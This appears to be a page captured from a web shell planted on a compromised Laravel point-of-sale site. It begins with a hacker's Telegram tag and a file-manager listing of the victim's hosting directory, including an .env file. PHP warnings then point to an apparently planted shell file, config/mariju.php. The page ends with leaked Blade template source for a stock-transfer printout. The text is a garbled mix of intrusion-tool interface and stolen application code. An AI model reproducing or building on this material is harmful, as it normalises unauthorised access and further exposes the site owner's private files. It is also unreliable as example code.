telegram : @iamdarkcomedy i am hacker

path :/home/bisorgosof24/public_html/Backup23122024

upload file:

List of files:

name file size edit permission action
.env2733 KBDecember 22 2024 06:20:070644
404.html58370 KBNovember 20 2024 15:32:220644
502.html58368 KBNovember 20 2024 15:32:220644
Modules-December 11 2024 21:02:560755
README.md4158 KBFebruary 14 2023 12:31:560644
app-December 11 2024 17:57:480755
artisan1686 KBFebruary 14 2023 12:31:560644
bootstrap-December 11 2024 20:23:360755
composer.json3761 KBDecember 11 2024 22:15:000644
composer.lock512048 KBDecember 11 2024 22:13:280644
config-June 15 2025 02:09:360755
database-December 05 2024 20:18:120755
dfsdf dfds fd fds findex.html1420 KBNovember 20 2024 15:32:240644
error_log16891436 KBJuly 18 2025 18:32:040644
firoz-December 23 2024 13:24:460755
index.php1667 KBDecember 14 2024 05:20:360644
lang-December 11 2024 21:02:480755
modules_statuses.json472 KBNovember 20 2024 15:32:240644
mpos-March 31 2025 02:36:310755
package.json226 KBFebruary 14 2023 12:31:560644
phpunit.xml1146 KBFebruary 14 2023 12:31:560644
public-March 31 2025 02:36:310755
resources-December 11 2024 21:10:220755
routes-June 15 2025 02:09:310755
storage-December 11 2024 21:12:440755
tests-December 05 2024 20:18:120755
vendor-December 11 2024 22:13:300755
vite.config.js263 KBFebruary 14 2023 12:31:560644

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 227

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 228

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 229

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 230
@lang('lang_v1.location_from'):
{{ $location_details['sell']->name }} @if(!empty($location_details['sell']->landmark))
{{$location_details['sell']->landmark}} @endif @if(!empty($location_details['sell']->city) || !empty($location_details['sell']->state) || !empty($location_details['sell']->country))
{{implode(',', array_filter([$location_details['sell']->city, $location_details['sell']->state, $location_details['sell']->country]))}} @endif @if(!empty($sell_transfer->contact->tax_number))
@lang('contact.tax_no'): {{$sell_transfer->contact->tax_number}} @endif @if(!empty($location_details['sell']->mobile))
@lang('contact.mobile'): {{$location_details['sell']->mobile}} @endif @if(!empty($location_details['sell']->email))
Email: {{$location_details['sell']->email}} @endif
@lang('lang_v1.location_to'):
{{ $location_details['purchase']->name }} @if(!empty($location_details['purchase']->landmark))
{{$location_details['purchase']->landmark}} @endif @if(!empty($location_details['purchase']->city) || !empty($location_details['purchase']->state) || !empty($location_details['purchase']->country))
{{implode(',', array_filter([$location_details['purchase']->city, $location_details['purchase']->state, $location_details['purchase']->country]))}} @endif @if(!empty($sell_transfer->contact->tax_number))
@lang('contact.tax_no'): {{$sell_transfer->contact->tax_number}} @endif @if(!empty($location_details['purchase']->mobile))
@lang('contact.mobile'): {{$location_details['purchase']->mobile}} @endif @if(!empty($location_details['purchase']->email))
Email: {{$location_details['purchase']->email}} @endif
@lang('purchase.ref_no'): #{{ $sell_transfer->ref_no }}
@lang('messages.date'): {{ @format_date($sell_transfer->transaction_date) }}

@php $total = 0.00; @endphp @foreach($sell_transfer->sell_lines as $sell_lines) @php $total += ($sell_lines->unit_price_inc_tax * $sell_lines->quantity); @endphp @endforeach
# @lang('sale.product') @lang('sale.qty') @lang('sale.subtotal')
{{ $loop->iteration }} {{ $sell_lines->product->name }} @if( $sell_lines->product->type == 'variable') - {{ $sell_lines->variations->product_variation->name}} - {{ $sell_lines->variations->name}} @endif - {{ $sell_lines->variations->sub_sku}} @if($lot_n_exp_enabled && !empty($sell_lines->lot_details))
@lang('lang_v1.lot_n_expiry'): @if(!empty($sell_lines->lot_details->lot_number)) {{$sell_lines->lot_details->lot_number}} @endif @if(!empty($sell_lines->lot_details->exp_date)) - {{@format_date($sell_lines->lot_details->exp_date)}} @endif @endif
{{ @format_quantity($sell_lines->quantity) }} {{$sell_lines->product->unit->short_name ?? ""}} {{ $sell_lines->unit_price_inc_tax * $sell_lines->quantity }}

@if( !empty( $sell_transfer->shipping_charges ) ) @endif
@lang('purchase.net_total_amount'): {{ $total }}
@lang('purchase.additional_shipping_charges'): (+) {{ $sell_transfer->shipping_charges }}
@lang('purchase.purchase_total'): {{ $sell_transfer->final_total }}
@lang('purchase.additional_notes'):

@if($sell_transfer->additional_notes) {{ $sell_transfer->additional_notes }} @else -- @endif

{{-- Barcode --}}